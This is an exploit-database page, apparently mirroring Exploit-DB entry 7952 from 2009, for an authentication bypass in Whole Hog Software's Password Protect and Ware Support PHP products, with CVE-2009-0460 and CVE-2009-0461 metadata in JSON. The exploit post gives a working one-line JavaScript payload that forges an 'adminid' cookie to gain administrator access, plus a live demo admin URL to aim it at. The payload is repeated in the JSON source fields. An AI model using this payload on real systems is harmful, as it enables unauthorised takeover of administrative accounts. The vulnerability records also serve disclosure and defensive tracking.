Search...

WholeHogSoftware Password Protect Insecure Cookie Handling Vuln

2009-02-03T00:00:00

ID EDB-ID:7952
Type exploitdb
Reporter Stack
Modified 2009-02-03T00:00:00

Description

WholeHogSoftware Password Protect Insecure Cookie Handling Vuln. CVE-2009-0460,CVE-2009-0461. Webapps exploit for php platform

                                        
                                            ###########################################################################
[+] WholeHogSoftware Password Protect Insecure Cookie Handling Vulnerability
[+] Script   :Password Protect
[+] Site     :http://wholehogsoftware.com
[+] Detay    :http://www.wholehogsoftware.com/index.php/page/password_protect_enhanced
[+] Discovered By Mountassif Moad   
              
[+] www.v4-team.com            
       
[+] Greetz : All my Freind
###########################################################################
Exploit:
javascript:document.cookie = "adminid=8; path=/";
DeMo :
http://www.wholehogsoftware.com/demo/password_protect_enhanced/admin

# milw0rm.com [2009-02-03]

JSON Vulners Source

Initial Source

{"published": "2009-02-03T00:00:00", "id": "EDB-ID:7952", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"score": {"value": 10.0, "vector": "NONE"}, "vulnersScore": 10.0}, "hash": "3f9941be3924510efe026c9880eaf46b9eda9fff8ae2daa0c4b784b1e8777751", "description": "WholeHogSoftware Password Protect Insecure Cookie Handling Vuln. CVE-2009-0460,CVE-2009-0461. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/7952/", "lastseen": "2016-02-01T03:24:46", "edition": 1, "title": "WholeHogSoftware Password Protect Insecure Cookie Handling Vuln", "osvdbidlist": ["51734"], "modified": "2009-02-03T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0460", "CVE-2009-0461"], "sourceHref": "https://www.exploit-db.com/download/7952/", "references": [], "reporter": "Stack", "sourceData": "###########################################################################\n[+] WholeHogSoftware Password Protect Insecure Cookie Handling Vulnerability\n[+] Script :Password Protect\n[+] Site :http://wholehogsoftware.com\n[+] Detay :http://www.wholehogsoftware.com/index.php/page/password_protect_enhanced\n[+] Discovered By Mountassif Moad \n \n[+] www.v4-team.com \n \n[+] Greetz : All my Freind\n###########################################################################\nExploit:\njavascript:document.cookie = \"adminid=8; path=/\";\nDeMo :\nhttp://www.wholehogsoftware.com/demo/password_protect_enhanced/admin\n\n# milw0rm.com [2009-02-03]\n", "objectVersion": "1.0"}

{"cve": [{"lastseen": "2017-10-19T11:13:31", "references": ["https://www.exploit-db.com/exploits/7952", "http://www.securityfocus.com/bid/33577"], "description": "Whole Hog Password Protect: Enhanced 1.x allows remote attackers to bypass authentication and obtain administrative access via an integer value in the adminid cookie.", "edition": 2, "reporter": "NVD", "published": "2009-02-10T02:00:24", "title": "CVE-2009-0461", "type": "cve", "enchantments": {"score": {"modified": "2017-10-19T11:13:31", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-0461"], "scanner": [], "modified": "2017-10-18T21:30:18", "cpe": ["cpe:/a:wholehogsoftware:password_protect:1.0"], "id": "CVE-2009-0461", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0461", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-19T11:13:31", "references": ["http://www.securityfocus.com/bid/33577", "https://www.exploit-db.com/exploits/7951"], "description": "Whole Hog Ware Support 1.x allows remote attackers to bypass authentication and obtain administrative access via an integer value in the adminid cookie.", "edition": 2, "reporter": "NVD", "published": "2009-02-10T02:00:24", "title": "CVE-2009-0460", "type": "cve", "enchantments": {"score": {"modified": "2017-10-19T11:13:31", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-0460"], "scanner": [], "modified": "2017-10-18T21:30:17", "cpe": ["cpe:/a:wholehogsoftware:ware_support:1.0"], "id": "CVE-2009-0460", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0460", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T03:24:37", "osvdbidlist": ["51734"], "references": [], "description": "WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability. CVE-2009-0460,CVE-2009-0461. Webapps exploit for php platform", "edition": 1, "reporter": "Stack", "published": "2009-02-03T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "type": "exploitdb", "title": "WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0460", "CVE-2009-0461"], "modified": "2009-02-03T00:00:00", "id": "EDB-ID:7951", "href": "https://www.exploit-db.com/exploits/7951/", "sourceData": "###########################################################################\n[+] WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability\n[+] Script :Ware Support\n[+] Site :http://wholehogsoftware.com\n[+] Detay :http://wholehogsoftware.com/index.php/page/ware_support\n[+] Discovered By Mountassif Moad \n \n[+] www.v4-team.com \n \n[+] Greetz : All my Freind\n###########################################################################\nExploit:\njavascript:document.cookie = \"adminid=8; path=/\";\nDeMo :\nhttp://www.wholehogsoftware.com/demo/support/admin/\n\n# milw0rm.com [2009-02-03]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7951/"}]}